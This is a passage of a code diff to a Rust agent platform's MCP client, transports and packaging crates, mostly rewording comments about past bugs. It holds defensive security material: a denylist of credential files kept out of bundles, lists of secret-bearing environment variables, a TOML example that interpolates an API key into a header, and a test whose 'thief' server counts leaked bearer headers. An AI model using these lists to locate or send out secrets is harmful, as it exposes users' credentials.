-        // comparison in the codebase still using `==`, and "theoretical" is not
-        // a reason for the comparison to differ from every other one.
+        // Constant-time: a timing oracle on 128 bits of fresh entropy over
+        // loopback is theoretical, but every secret comparison in this
+        // workspace goes through the same primitive.
         (Some(code), Some(state)) if leviath_core::constant_time_eq(state, expected_state) => {
             write_response(
                 &mut stream,
@@ -921,11 +920,10 @@ mod tests {
         assert_eq!(params["resource"], "https://mcp.example.com/mcp");
     }
 
-    // `authorize_url_rejects_a_bad_endpoint` is gone with the `&str` parameter:
-    // `build_authorize_url` now takes an already-parsed `Url`, because
+    // `build_authorize_url` takes an already-parsed `Url`, because
     // `validate_auth_server_metadata` parses and origin-checks the endpoint
-    // before login ever gets here. An unparseable endpoint is covered end to end
-    // by `login_fails_when_the_authorize_endpoint_is_malformed`.
+    // before login gets here. An unparseable endpoint is covered end to end by
+    // `login_fails_when_the_authorize_endpoint_is_malformed`.
 
     // ─── expires_at ───────────────────────────────────────────────────────
 
@@ -2281,10 +2279,9 @@ mod tests {
             )
             .await
             .expect_err("a bad authorize endpoint must fail");
-        // Caught during metadata validation now, which runs before the URL is
-        // built - so the message names the field rather than the later
-        // build-the-authorize-URL step. Earlier is better: the endpoint never
-        // reaches the browser opener.
+        // Metadata validation runs before the URL is built, so the message
+        // names the field rather than the later build-the-authorize-URL step,
+        // and the endpoint never reaches the browser opener.
         assert!(
             err.to_string().contains("authorization_endpoint"),
             "got: {err}"
@@ -2521,8 +2518,8 @@ mod tests {
     }
 
     /// The case this whole path exists for. A server holding its own API token
-    /// answers the probe normally, so there is no OAuth flow to run, and the
-    /// old code went looking for a discovery document such a server does not
+    /// answers the probe normally, so there is no OAuth flow to run: skipping
+    /// the probe goes looking for a discovery document such a server does not
     /// publish.
     #[tokio::test]
     async fn probe_with_headers_the_server_accepts_is_satisfied() {
@@ -2566,8 +2563,8 @@ mod tests {
 
     /// The probe has to send what the transport will send, `${VAR}` expanded
     /// and all. A server that checks the *value* of the credential rejects a
-    /// literal `${TOKEN}`, and a correctly configured client was being sent
-    /// into an OAuth flow on the strength of that rejection.
+    /// literal `${TOKEN}`, which would send a correctly configured client into
+    /// an OAuth flow it does not need.
     #[tokio::test]
     async fn the_probe_expands_variables_the_way_the_transport_will() {
         let listener = tokio::net::TcpListener::bind("127.0.0.1:0").await.unwrap();

--- a/crates/leviath-mcp/src/auth/store.rs
+++ b/crates/leviath-mcp/src/auth/store.rs
@@ -669,8 +669,8 @@ mod tests {
 
     /// Access *and refresh* tokens for every MCP server. Written with the mode
     /// already applied, so there is no window - however brief - where another
-    /// local user could read them. The previous `fs::write` + `chmod` left the
-    /// file at the umask default (typically 0644) in between, on every save.
+    /// local user could read them. An `fs::write` followed by a `chmod` leaves
+    /// the file at the umask default (typically 0644) in between, on every save.
     #[cfg(unix)]
     #[test]
     fn saving_never_leaves_the_token_store_group_or_world_readable() {

--- a/crates/leviath-mcp/src/client.rs
+++ b/crates/leviath-mcp/src/client.rs
@@ -56,8 +56,8 @@ pub struct ToolResult {
     /// Whether the result represents a *tool execution* error (as opposed to a
     /// JSON-RPC protocol error, which never reaches this type).
     ///
-    /// The wire name is `isError`. Without the rename this never matched, so
-    /// every failing tool call was silently reported to the model as a success.
+    /// The wire name is `isError`; without the rename the field never matches
+    /// and defaults to `false`, so a failing tool call reads as a success.
     #[serde(rename = "isError", default)]
     pub is_error: bool,
 }
@@ -84,8 +84,8 @@ pub struct EmbeddedResource {
 /// Content item in a tool result.
 ///
 /// Every wire field name here is the spec's camelCase spelling (`mimeType`),
-/// not a Rust-style snake_case one - mismatches made whole tool results fail to
-/// deserialize.
+/// not a Rust-style snake_case one - one mismatched name fails the whole tool
+/// result to deserialize.
 #[derive(Debug, Clone, Serialize, Deserialize, PartialEq)]
 #[serde(tag = "type")]
 pub enum ToolResultContent {
@@ -147,10 +147,9 @@ pub enum ToolResultContent {
 /// MCP protocol revisions this client understands, newest first.
 ///
 /// The client offers the newest and adopts whatever the server echoes back.
-/// Pinning a single old revision - as this used to, with `2024-11-05`
-/// hardcoded - locks every connection to the oldest dialect and, on HTTP,
-/// actively misdeclares the connection: the streamable transport postdates
-/// that revision entirely.
+/// Pinning a single old revision locks every connection to the oldest dialect
+/// and, on HTTP, actively misdeclares the connection: the streamable transport
+/// postdates `2024-11-05` entirely.
 pub const SUPPORTED_PROTOCOL_VERSIONS: &[&str] =
     &["2025-11-25", "2025-06-18", "2025-03-26", "2024-11-05"];
 
@@ -198,13 +197,6 @@ impl MCPClient {
     /// "how long should a person's agent startup hang on a broken server",
     /// and a test suite is not a person: a CI runner that stalls for two
     /// minutes fails a 30s deadline while proving nothing about the server.
-    ///
-    /// That is not hypothetical. On 2026-08-21 a `windows-latest` job froze
-    /// for 159 seconds - zero tests completed, the binary took 241s against a
-    /// normal 40s - and the one test carrying this deadline was the only
-    /// casualty, reported the instant the process was scheduled again. The
-    /// Python stub it was talking to had done nothing wrong; neither had the
-    /// transport.
     ///
     /// Production keeps the 30s: the trade this makes is only that a test may
     /// wait a long time before failing, which costs a slow test rather than a
@@ -303,7 +295,6 @@ impl MCPClient {
             .request_with_timeout("initialize", init_params, self.connect_timeout)
             .await?;
 
-        // Parse server capabilities
         let capabilities: ServerCapabilities = if let Some(caps) = result.get("capabilities") {
             serde_json::from_value(caps.clone()).unwrap_or_default()
         } else {
@@ -313,7 +304,6 @@ impl MCPClient {
         let version = negotiated_version(result.get("protocolVersion"));
         self.protocol_version = Some(version.clone());
 
-        // Send initialized notification
         self.send_notification("notifications/initialized", serde_json::json!({}))
             .await?;
 
@@ -511,8 +501,8 @@ mod tests {
         };
         let json = serde_json::to_string(&result).unwrap();
         assert!(json.contains("Hello"));
-        // Wire name is `isError`, not `is_error` - a mismatch here meant every
-        // failing tool call deserialized as a success.
+        // Wire name is `isError`, not `is_error`: a mismatch makes a failing
+        // tool call read as a success.
         assert!(json.contains("\"isError\":false"), "got: {json}");
         assert!(!json.contains("is_error"), "got: {json}");
     }
@@ -966,7 +956,6 @@ for line in sys.stdin:
     async fn test_mcp_client_spawn_succeeds() {
         let _guard = always_on_tracing_guard();
         let _client = spawn_stub_client(&echo_tool_stub().source()).await;
-        // If we got here, spawn worked
     }
 
     #[tokio::test]
@@ -983,7 +972,6 @@ for line in sys.stdin:
     #[tokio::test]
     async fn test_mcp_client_capabilities_before_connect_is_none() {
         let client = spawn_stub_client(&echo_tool_stub().source()).await;
-        // Before connect, capabilities should be None
         assert!(client.capabilities().is_none());
     }
 
@@ -1017,7 +1005,6 @@ for line in sys.stdin:
         assert_eq!(tools.len(), 1);
         assert_eq!(tools[0].name, "echo");
 
-        // cached_tools() should now return them too
         assert_eq!(client.cached_tools().len(), 1);
         assert_eq!(client.cached_tools()[0].name, "echo");
     }
@@ -1247,10 +1234,9 @@ for line in sys.stdin:
 
     #[test]
     fn tool_result_reads_is_error_from_camel_case_wire_name() {
-        // The regression that motivated all of this: the wire field is
-        // `isError`. Reading `is_error` never matched, so `#[serde(default)]`
-        // silently produced `false` and every failed tool call was handed to
-        // the model as a success.
+        // The wire field is `isError`. Reading `is_error` never matches it,
+        // so `#[serde(default)]` silently yields `false` and every failed tool
+        // call reaches the model as a success.
         let json = r#"{"content":[{"type":"text","text":"boom"}],"isError":true}"#;
         let result: ToolResult = serde_json::from_str(json).unwrap();
         assert!(result.is_error, "isError:true must deserialize as an error");

--- a/crates/leviath-mcp/src/discovery.rs
+++ b/crates/leviath-mcp/src/discovery.rs
@@ -229,7 +229,6 @@ impl ToolDiscovery {
 
     /// Discover tools by spawning a client from a server config.
     ///
-    /// Spawns the server process, connects, and discovers tools.
     /// Returns the tools and the live client (caller keeps it alive for tool calls).
     pub async fn discover_from_config(
         &mut self,
@@ -337,7 +336,6 @@ mod tests {
         let meta: ToolMetadata = serde_json::from_str(json).unwrap();
         assert_eq!(meta.schema, serde_json::json!({"type": "string"}));
 
-        // Serializes back as inputSchema
         let serialized = serde_json::to_value(&meta).unwrap();
         assert!(serialized.get("inputSchema").is_some());
         assert!(serialized.get("schema").is_none());

--- a/crates/leviath-mcp/src/execution.rs
+++ b/crates/leviath-mcp/src/execution.rs
@@ -122,8 +122,8 @@ impl ToolExecutor {
     /// process. `None` if no such server is registered.
     ///
     /// The pool's idle-disconnect uses this: a per-agent server whose last
-    /// leasing run ended has no caller left, and before this the connection
-    /// (and its child process) lived until the daemon exited.
+    /// leasing run ended has no caller left, and its connection and child
+    /// process would otherwise live until the daemon exits.
     pub fn remove_client(&mut self, server_name: &str) -> Option<MCPClient> {
         let shared = self.clients.remove(server_name)?;
         // A call still in flight holds a clone of the `Arc`. Removing the
@@ -146,13 +146,13 @@ impl ToolExecutor {
     /// Compute a unique, provider-safe advertised name for `original`.
     ///
     /// **Always** `<server>__<tool>`, sanitized. The server is part of the name
-    /// whether or not anything would have collided, because the alternative -
-    /// bare name, prefixed only on a clash - made the name a function of
-    /// registration order. Two servers both advertising `search` gave the bare
-    /// name to whichever appeared first in `config.toml`, so a blueprint saying
-    /// `available_tools = ["search"]` meant a different server's tool depending
-    /// on the order of a file it does not control, and reordering that file
-    /// silently re-pointed the grant.
+    /// whether or not anything would collide, because the alternative -
+    /// bare name, prefixed only on a clash - makes the name a function of
+    /// registration order. Two servers both advertising `search` would give the
+    /// bare name to whichever appears first in `config.toml`, so a blueprint
+    /// saying `available_tools = ["search"]` would mean a different server's
+    /// tool depending on the order of a file it does not control, and
+    /// reordering that file would silently re-point the grant.
     ///
     /// Qualifying every name removes the question. `alpha__search` and
     /// `beta__search` say which server they came from, and neither depends on
@@ -506,8 +506,6 @@ mod tests {
         assert!(result.data.is_array());
     }
 
-    // ─── execute_filtered: allowed tool ────────────────────────────────
-
     // ─── execute: no server ─────────────────────────────────────────────
 
     #[tokio::test]
@@ -558,8 +556,9 @@ mod tests {
     }
 
     /// Two servers, one slow: a batch that names both takes as long as the
-    /// slow one, not the sum. Before the per-server lock the executor's own
-    /// lock serialised every call behind whichever was in flight.
+    /// slow one, not the sum. One lock per server is what allows that; a lock
+    /// around the executor would serialise every call behind whichever is in
+    /// flight.
     #[tokio::test]
     async fn calls_to_different_servers_overlap() {
         let mut executor = ToolExecutor::new();
@@ -661,11 +660,7 @@ mod tests {
     // ─── add_client / execute / execute_on with a live client ───────────
     //
     // Same Python-backed JSON-RPC stub approach used in client.rs/discovery.rs
-    // tests. Note: MCPClient::shutdown() always returns Ok(()) by design (it
-    // swallows failures so a dead server can't block cleanup) - so
-    // shutdown_all()'s error-collection branch is intentionally left
-    // uncovered here; there's no way to make client.shutdown() fail without
-    // changing that documented "always succeeds" behavior.
+    // tests.
 
     async fn spawn_echo_client() -> MCPClient {
         spawn_ready_client(&echo_tool_stub().source()).await
@@ -730,10 +725,8 @@ mod tests {
         assert_eq!(result.text, "hello from tool");
     }
 
-    /// The end-to-end path against a live stub server. This used to go through
-    /// `execute_filtered`, which is gone; the call it actually exercised -
-    /// route by advertised name, dispatch, map the result - is `execute`, so
-    /// the coverage moves rather than disappearing with its wrapper.
+    /// The end-to-end path against a live stub server: `execute` routes by
+    /// advertised name, dispatches, and maps the result.
     #[tokio::test]
     async fn execute_routes_to_a_live_server_and_succeeds() {
         let _guard = always_on_tracing_guard();
@@ -956,8 +949,7 @@ mod tests {
     // ─── unique_advertised_name ───────────────────────────────────────────
 
     /// Every advertised name carries its server, whether or not anything would
-    /// have collided. The old scheme handed out the bare name first, which made
-    /// it depend on which server registered earliest.
+    /// collide, so the name never depends on which server registered first.
     #[test]
     fn unique_name_always_qualifies_with_the_server() {
         let exec = ToolExecutor::new();

--- a/crates/leviath-mcp/src/transport/http.rs
+++ b/crates/leviath-mcp/src/transport/http.rs
@@ -92,9 +92,9 @@ fn build_http_client() -> reqwest::Client {
 /// be sent as if it were the credential.
 ///
 /// A credential-shaped variable is refused unless the user named it, exactly as
-/// a Rhai script tool's `env_var` is. Without this the two transports disagreed:
-/// a stdio server got a filtered environment, while an HTTP server's `headers`
-/// could interpolate *any* variable the daemon held -
+/// a Rhai script tool's `env_var` is. Without it the two transports disagree:
+/// a stdio server gets a filtered environment, while an HTTP server's `headers`
+/// can interpolate *any* variable the daemon holds -
 ///
 /// ```toml
 /// headers = { X-A = "${ANTHROPIC_API_KEY}" }
@@ -209,8 +209,8 @@ pub(crate) struct HttpTransport {
     legacy: Option<LegacyStream>,
     /// How long a notification's POST may take. `send_request` takes its
     /// deadline as an argument; the trait gives a notification none, and a
-    /// server that accepts the connection and stalls used to hold it open
-    /// for the full read-stall timeout. A field so a test can shorten it.
+    /// server that accepts the connection and stalls would otherwise hold it
+    /// open for the full read-stall timeout. A field so a test can shorten it.
     notification_timeout: Duration,
     /// Re-auths the bearer on a mid-session `401`, if configured.
     refresher: Option<Arc<dyn BearerRefresher>>,
@@ -599,7 +599,6 @@ impl HttpTransport {
         };
 
         self.learn_session(&response_headers, &parsed);
-        // Take the id out of the borrow so `learn_session` can mutate self.
         parsed.id.take();
         Ok(parsed)
     }
@@ -691,8 +690,8 @@ enum SseEnd {
 /// Keepalive frames (an event with empty data) are skipped here, so a caller
 /// only ever sees an event worth decoding. The two readers of an MCP event
 /// stream - the reply reader, which fails the request when the stream ends,
-/// and the legacy pump, which logs and stops - used to carry this loop each;
-/// what they do about an ending is theirs, how bytes become events is not.
+/// and the legacy pump, which logs and stops - share it: what they do about an
+/// ending is theirs, how bytes become events is not.
 async fn next_sse_event<S, B>(
     stream: &mut S,
     buffer: &mut String,
@@ -1257,7 +1256,7 @@ mod tests {
     }
 
     /// A legacy server announces where to POST. `Url::join` with an absolute
-    /// URL replaces the base entirely, so an unchecked endpoint event let the
+    /// URL replaces the base entirely, so an unchecked endpoint event lets the
     /// server redirect every later request - each carrying its OAuth bearer and
     /// any configured secret headers - to a host of its choosing.
     ///
@@ -1352,12 +1351,11 @@ mod tests {
         // test claims: a leak is by definition a request holding the header, so
         // narrowing the count cannot hide the regression this exists to catch.
         //
-        // Counting every request made the test answerable by traffic that has
-        // nothing to do with it. The port is ephemeral and this binary runs its
-        // tests in parallel, so a connection from another test - against a port
-        // the OS has since recycled into this listener - lands on the fallback
-        // and reads as a stolen header. That is how it failed once on
-        // ubuntu-24.04-arm with `left: 1, right: 0`.
+        // Counting every request would make the test answerable by traffic
+        // that has nothing to do with it. The port is ephemeral and this binary
+        // runs its tests in parallel, so a connection from another test -
+        // against a port the OS has since recycled into this listener - lands
+        // on the fallback and would read as a stolen header.
         let leaked = Arc::new(AtomicUsize::new(0));
         let thief = Router::new().fallback({
             let leaked = leaked.clone();
@@ -1401,8 +1399,8 @@ mod tests {
 
         // The property that makes the count trustworthy: traffic reaching this
         // port without the header is not a leak and must not read as one. This
-        // is the stray connection - another test's client against a recycled
-        // ephemeral port - that used to fail the assertion above.
+        // stray connection - another test's client against a recycled
+        // ephemeral port - must leave the assertion above green.
         reqwest::Client::new()
             .get(format!("{thief_base}/unrelated"))
             .send()
@@ -1618,9 +1616,9 @@ mod tests {
         assert!(err.to_string().contains("did not respond"), "got: {err}");
     }
 
-    /// A notification has no reply to wait for, which is exactly why it had
-    /// no deadline: a server that took the POST and never answered held the
-    /// connection for the whole read-stall timeout.
+    /// A notification has no reply to wait for, so its POST carries a deadline
+    /// of its own: without one a server that takes the POST and never answers
+    /// holds the connection for the whole read-stall timeout.
     #[tokio::test]
     async fn a_slow_server_times_out_a_notification_too() {
         let _guard = always_on_tracing_guard();
@@ -2327,7 +2325,7 @@ mod tests {
         // reaching the `post()?` arm inside `legacy_request`.
         //
         // The endpoint stays on the server's own origin. Naming a closed port
-        // on another host would be shorter, but the transport now refuses a
+        // on another host would be shorter, but the transport refuses a
         // cross-origin endpoint event before it ever posts, so that version of
         // this test would pass while exercising none of what it describes.
         let (app, _tx) = legacy_app("/messages");

--- a/crates/leviath-mcp/src/transport/stdio.rs
+++ b/crates/leviath-mcp/src/transport/stdio.rs
@@ -82,13 +82,13 @@ fn command_candidates(command: &str) -> Vec<String> {
 ///
 /// **Allowlist, not denylist.** An MCP server is third-party code by definition,
 /// and we are choosing what to hand it - so the question is "what does it need",
-/// not "what must we remember to withhold". The previous substring denylist
-/// (`API_KEY`, `SECRET_KEY`, `ACCESS_TOKEN`, …) passed everything whose name
-/// happened not to match: `AWS_SECRET_ACCESS_KEY` matches neither `API_SECRET`
-/// nor `SECRET_KEY`, and `GITHUB_TOKEN`, `GH_TOKEN`, `NPM_TOKEN`,
-/// `DATABASE_URL`, `SSH_AUTH_SOCK` and Leviath's own `LEVIATH_API_TOKEN` were
-/// never on the list at all. A denylist here loses to every credential the
-/// ecosystem invents next.
+/// not "what must we remember to withhold". A substring denylist (`API_KEY`,
+/// `SECRET_KEY`, `ACCESS_TOKEN`, …) passes everything whose name happens not to
+/// match: `AWS_SECRET_ACCESS_KEY` matches neither `API_SECRET` nor
+/// `SECRET_KEY`, and `GITHUB_TOKEN`, `GH_TOKEN`, `NPM_TOKEN`, `DATABASE_URL`,
+/// `SSH_AUTH_SOCK` and Leviath's own `LEVIATH_API_TOKEN` match nothing on such
+/// a list at all. A denylist here loses to every credential the ecosystem
+/// invents next.
 ///
 /// What survives is [`leviath_core::child_env_allowed`]: enough to find an
 /// interpreter and behave like a terminal program. Anything else a server
@@ -145,6 +145,9 @@ impl StdioTransport {
         args: &[&str],
         env: &HashMap<String, String>,
     ) -> std::io::Result<Child> {
+        // The server talks JSON-RPC over its pipes and has no use for a
+        // console. It matters most here: `command_candidates` resolves `npx` to
+        // `npx.cmd`, a batch file, which Windows always runs through `cmd.exe`.
         let mut cmd = leviath_sys::child_command_async(command);
 
         // Build a clean environment, then layer the explicitly configured vars
@@ -157,10 +160,6 @@ impl StdioTransport {
             .stdin(std::process::Stdio::piped())
             .stdout(std::process::Stdio::piped())
             .stderr(std::process::Stdio::piped());
-
-        // The server talks JSON-RPC over those pipes and has no use for a
-        // console. It matters most here: `command_candidates` resolves `npx` to
-        // `npx.cmd`, a batch file, which Windows always runs through `cmd.exe`.
 
         cmd.spawn()
     }
@@ -413,8 +412,8 @@ impl Transport for StdioTransport {
         )
         .await?;
 
-        // Bounded: a server that accepts the request and then goes silent used
-        // to block the caller forever.
+        // Bounded: without a deadline a server that accepts the request and
+        // then goes silent blocks the caller forever.
         match tokio::time::timeout(timeout, self.read_until_response()).await {
             Ok(result) => result,
             Err(_) => {
@@ -649,7 +648,7 @@ mod tests {
     /// ones. `SAFE_VAR` is harmless and still does not reach the child: a server
     /// that needs it declares it in its own `env` block, which the caller applies
     /// after this filter. That is the whole difference between an allowlist and
-    /// the denylist this replaced.
+    /// a denylist.
     #[test]
     fn filter_env_excludes_anything_not_on_the_allowlist() {
         let vars = [
@@ -882,8 +881,8 @@ for line in sys.stdin:
     #[tokio::test]
     async fn closed_connection_is_an_error_not_a_panic() {
         let _guard = always_on_tracing_guard();
-        // Regression guard: an `.expect()` on the read turns a server dying
-        // mid-request into a daemon panic rather than a failed call.
+        // An `.expect()` on the read would turn a server dying mid-request
+        // into a daemon panic rather than a failed call.
         let script = "import sys\nsys.stdin.readline()\nsys.stdout.close()\n";
         let mut t = spawn_stub(script).await;
         let err = t

--- a/crates/leviath-net/src/lib.rs
+++ b/crates/leviath-net/src/lib.rs
@@ -30,11 +30,10 @@ use std::time::Duration;
 
 /// The floor every outbound HTTP client in the workspace gets.
 ///
-/// Two clients were built with a bare `reqwest::Client::new()` and therefore had
-/// **no timeouts at all**: webhook delivery (so an endpoint that accepts a
-/// connection and never answers hung that delivery forever) and the package
-/// registry. `Client::new()` is an easy default to reach for and a bad one for
-/// anything talking to a host we do not control.
+/// A bare `reqwest::Client::new()` carries **no timeouts at all**, so an
+/// endpoint that accepts a connection and never answers holds a webhook
+/// delivery or a registry fetch open forever. It is an easy default to reach
+/// for and a bad one for anything talking to a host we do not control.
 ///
 /// Values are deliberately generous - this is a floor to stop a hang, not a
 /// performance budget. A caller with a real reason for different numbers builds
@@ -444,8 +443,8 @@ mod tests {
         url::Url::parse(s).expect("test URL parses")
     }
 
-    /// The floor exists because two clients were built with a bare
-    /// `Client::new()` and had no timeouts at all.
+    /// The floor exists because a bare `Client::new()` carries no timeouts at
+    /// all.
     #[test]
     fn the_default_timeouts_are_a_real_floor() {
         let t = ClientTimeouts::default();

--- a/crates/leviath-net/src/read_caps.rs
+++ b/crates/leviath-net/src/read_caps.rs
@@ -1,13 +1,13 @@
 //! How much the daemon will buffer from a remote peer before giving up.
 //!
-//! Every reader of a provider body, a streamed frame or an MCP line used to
-//! accumulate until the peer stopped sending. A peer that never stops (a
-//! misbehaving gateway, a compromised MCP server, a proxy replaying a file)
-//! therefore grew the daemon's heap until the kernel killed it, and it took
-//! every run down with it. The caps here are fixed numbers, not config keys:
-//! each is far above anything a well-formed reply needs, so a user has no
-//! reason to raise one, and a knob that only ever matters under attack is a
-//! knob an attacker gets to reason about.
+//! A reader of a provider body, a streamed frame or an MCP line accumulates
+//! until the peer stops sending. A peer that never stops (a misbehaving
+//! gateway, a compromised MCP server, a proxy replaying a file) would grow the
+//! daemon's heap until the kernel kills it, taking every run with it. The caps
+//! here are fixed numbers, not config keys: each is far above anything a
+//! well-formed reply needs, so a user has no reason to raise one, and a knob
+//! that only ever matters under attack is a knob an attacker gets to reason
+//! about.
 //!
 //! Over a cap is an error to the caller, never a hang and never a panic. The
 //! message names the cap and the peer, so a log line says which endpoint

--- a/crates/leviath-package/src/bundler.rs
+++ b/crates/leviath-package/src/bundler.rs
@@ -30,21 +30,18 @@ impl AgentBundler {
     /// Create a new bundler.
     pub fn new() -> Self {
         Self {
-            // A publishing denylist has to be exhaustive to be correct, and this
-            // one was not: it named `.env`, `.env.local` and `.env.production`
-            // but matched exact names and `*.suffix` only, so `.env.staging`,
-            // `.env.test`, `id_rsa`, `.netrc`, `.npmrc`, `credentials.json` and
-            // `service-account.json` were all bundled and shipped.
+            // A publishing denylist has to be exhaustive to be correct, so the
+            // patterns match whole families (`.env*`, `id_rsa*`) rather than
+            // the two or three spellings someone thought of, and the
+            // exact-name entries are the credential files that actually turn
+            // up in project directories.
             //
-            // Still a denylist - an allowlist would break every agent that ships
-            // an unanticipated data file - but a `.env*` prefix rule now covers
-            // the whole family, and the exact-name entries are the credential
-            // files that actually turn up in project directories.
+            // Still a denylist: an allowlist would break every agent that
+            // ships an unanticipated data file.
             exclude_patterns: vec![
                 ".git".to_string(),
                 ".DS_Store".to_string(),
                 "target".to_string(),
-                // Every `.env` variant, not three of them.
                 ".env*".to_string(),
                 "*.key".to_string(),
                 "*.pem".to_string(),
@@ -172,10 +169,6 @@ impl AgentBundler {
         Ok(output)
     }
 
-    /// Check if a filename should be excluded based on patterns.
-    ///
-    /// Supports wildcard patterns like `*.key` (matches any file ending in `.key`)
-    /// and exact filename matches like `.env`.
     /// Whether `filename` matches any exclusion pattern.
     ///
     /// Three shapes, which is all the patterns here need:
@@ -183,9 +176,8 @@ impl AgentBundler {
     /// - `*.ext` - matches by extension (`server.key`).
     /// - `prefix*` - matches by leading text (`.env*` covers `.env`,
     ///   `.env.staging`, `.env.test`; `id_rsa*` covers `id_rsa` and
-    ///   `id_rsa.pub`). Added because the exact-name-only matcher shipped
-    ///   `.env.staging` while excluding `.env.production`, which is precisely
-    ///   the kind of gap a hand-listed denylist accumulates.
+    ///   `id_rsa.pub`). A family is one pattern rather than a hand-listed set
+    ///   that accumulates gaps.
     /// - anything else: matched exactly.
     pub fn should_exclude(&self, filename: &str) -> bool {
         self.exclude_patterns.iter().any(|pattern| {
@@ -285,8 +277,7 @@ mod tests {
         }
     }
 
-    /// Credential files that turn up in real project directories and were all
-    /// bundled and shipped.
+    /// Credential files that turn up in real project directories.
     #[test]
     fn excludes_common_credential_files() {
         let bundler = AgentBundler::new();
@@ -888,8 +879,8 @@ mod tests {
     // a sink whose `flush` always errors but whose `write` always succeeds
     // makes `write_bundle` succeed) - so these `flush` impls are
     // unreachable via `write_bundle` no matter how the sink is configured.
-    // Test them directly, matching `always_on_subscriber_span_methods_are_all_no_ops`'s
-    // precedent elsewhere in this file for otherwise-unreachable trait-impl methods.
+    // Test them directly, as the workspace does elsewhere for otherwise
+    // unreachable trait-impl methods.
     #[test]
     fn always_failing_writer_flush_returns_error() {
         assert!(AlwaysFailingWriter.flush().is_err());

--- a/crates/leviath-package/src/installer.rs
+++ b/crates/leviath-package/src/installer.rs
@@ -95,8 +95,8 @@ pub struct AgentInstaller {
 
 /// The version and description an `agent.leviath` declares, with the
 /// defaults the catalogue shows when the file is missing, unreadable or not
-/// TOML: `0.0.0` and an empty description. Three listings used to read and
-/// parse the file each with these same two lookups inline.
+/// TOML: `0.0.0` and an empty description. Every listing reads the manifest
+/// through here, so they cannot disagree about what a broken one means.
 fn manifest_meta(manifest_path: &Path) -> (String, String) {
     let content = fs::read_to_string(manifest_path).unwrap_or_default();
     let parsed: toml::Value =
@@ -141,7 +141,6 @@ impl AgentInstaller {
             anyhow::anyhow!("Failed to read package '{}': {}", package_path.display(), e)
         })?;
 
-        // Derive name from filename (strip .leviath-bundle extension)
         let name = package_path
             .file_stem()
             .and_then(|s| s.to_str())
@@ -240,12 +239,11 @@ impl AgentInstaller {
         // Unpack into a staging directory and swap it in only once the contents
         // have passed every check.
         //
-        // Extracting straight into `agent_dir` meant a bundle that failed
-        // validation still left its files there - including the symlinks
-        // `reject_symlinks_with` had just refused, which `discover_blueprints`
-        // would then list as a runnable agent. And because this path
-        // `create_dir_all`s over an existing install, a failed *re-install*
-        // would leave a working agent half-overwritten.
+        // Extracting straight into `agent_dir` leaves a failed bundle's files
+        // there - including the symlinks `reject_symlinks_with` refuses, which
+        // `discover_blueprints` then lists as a runnable agent. And because
+        // this path `create_dir_all`s over an existing install, a failed
+        // *re-install* would leave a working agent half-overwritten.
         //
         // Staged *beside* the agents directory, not inside it, and still on the
         // same filesystem so the swap is a rename rather than a copy.
@@ -268,9 +266,9 @@ impl AgentInstaller {
         let mut staging = self.install_dir.clone().into_os_string();
         staging.push(format!(".staging-{name}-{}", std::process::id()));
         let staging = PathBuf::from(staging);
-        // The agents directory itself may not exist on a first install. The
-        // previous shape created it implicitly by unpacking into it; now that
-        // staging happens beside it, the rename needs it to be there already.
+        // The agents directory itself may not exist on a first install, and
+        // staging happens beside it rather than inside, so nothing else creates
+        // it: the rename needs it there already.
         // One fallible step and one error arm: staging is a sibling of the
         // agents directory, so if that directory could be created this one can
         // too - a second message would describe a failure nothing can reach.
@@ -371,17 +369,13 @@ impl AgentInstaller {
     /// Get information about a specific installed agent, or `None` if it is not
     /// installed.
     ///
-    /// Infallible on purpose, and the signature now says so. A manifest that
+    /// Infallible on purpose, and the signature says so. A manifest that
     /// cannot be read or parsed still means *installed* - the directory and the
     /// file are both there - so it reports the agent with whatever metadata it
     /// could recover rather than failing. That is the state you would run
     /// `lev remove` to fix, and an error here would be the one thing standing
-    /// between the user and the fix.
-    ///
-    /// It previously returned `anyhow::Result` and never once returned `Err`,
-    /// which left its only production caller `.unwrap()`-ing an infallible
-    /// result inside a function that returns `Result` - a panic waiting for
-    /// whoever made this propagate.
+    /// between the user and the fix. Returning a `Result` no arm ever fills
+    /// with `Err` only invites a caller to `.unwrap()` it.
     pub fn get_installed(&self, name: &str) -> Option<InstalledAgent> {
         let agent_dir = self.install_dir.join(name);
 
@@ -447,7 +441,7 @@ description = "{}"
 
     /// `install_from_bytes` is `pub` and joins `name` onto the install dir.
     /// `Path::join` does not normalize `..` and an absolute name replaces the
-    /// base entirely, so an unvalidated name reached anywhere on the filesystem.
+    /// base entirely, so an unvalidated name reaches anywhere on the filesystem.
     #[test]
     fn install_from_bytes_rejects_traversing_names() {
         let dir = tempfile::tempdir().unwrap();
@@ -901,10 +895,9 @@ description = "{}"
         );
     }
 
-    /// A bundle that fails validation must leave nothing on disk. Extracting
-    /// straight into the destination meant the symlinks `reject_symlinks_with`
-    /// had just refused stayed there, and `discover_blueprints` would list the
-    /// half-extracted tree as a runnable agent.
+    /// A bundle that fails validation must leave nothing on disk: anything left
+    /// behind is pre-validation content, and `discover_blueprints` would list
+    /// the half-extracted tree as a runnable agent.
     #[test]
     fn a_rejected_bundle_leaves_nothing_behind() {
         let dir = tempfile::tempdir().unwrap();
@@ -992,8 +985,8 @@ description = "{}"
     }
 
     /// A failed re-install must not destroy the agent that was already there.
-    /// This is why the fix is a staged swap and not a `remove_dir_all` on the
-    /// error path - that would have introduced exactly this bug.
+    /// A staged swap keeps that true; a `remove_dir_all` on the error path
+    /// would not.
     #[test]
     fn a_failed_reinstall_keeps_the_previous_install() {
         let dir = tempfile::tempdir().unwrap();

--- a/crates/leviath-providers/src/anthropic.rs
+++ b/crates/leviath-providers/src/anthropic.rs
@@ -37,8 +37,8 @@ fn maybe_dump_request(body: &serde_json::Value) {
 /// is the permissive bound: on Haiku a marker that clears it may still be
 /// declined, which costs nothing beyond the slot. A name-keyed table would be
 /// the alternative and is the shape of thing that goes stale silently - the
-/// Ollama context window was guessed from model names and was wrong by 4x
-/// (#475), which is the failure this deliberately avoids.
+/// Ollama context window guessed from model names is wrong by 4x, which is
+/// the failure this deliberately avoids.
 const MIN_CACHEABLE_TOKENS: usize = 1024;
 
 /// How far back Anthropic looks for a usable cache entry, in content blocks.
@@ -49,12 +49,11 @@ const MIN_CACHEABLE_TOKENS: usize = 1024;
 /// request's entry than this never finds it, however byte-identical the prefix
 /// is - the request reads nothing and rewrites the conversation at 1.25x.
 ///
-/// This is the fault behind #474, and it is why every earlier attempt in that
-/// thread moved the collapse around without removing it: the marker rolled
-/// forward with the conversation, and a workload appending a dozen content
-/// blocks a turn outran the lookback within a few turns and never got back
-/// inside it. Measured by the reporter across a run: reads climbed while the
-/// gap stayed at or below 21 blocks and died permanently at 25.
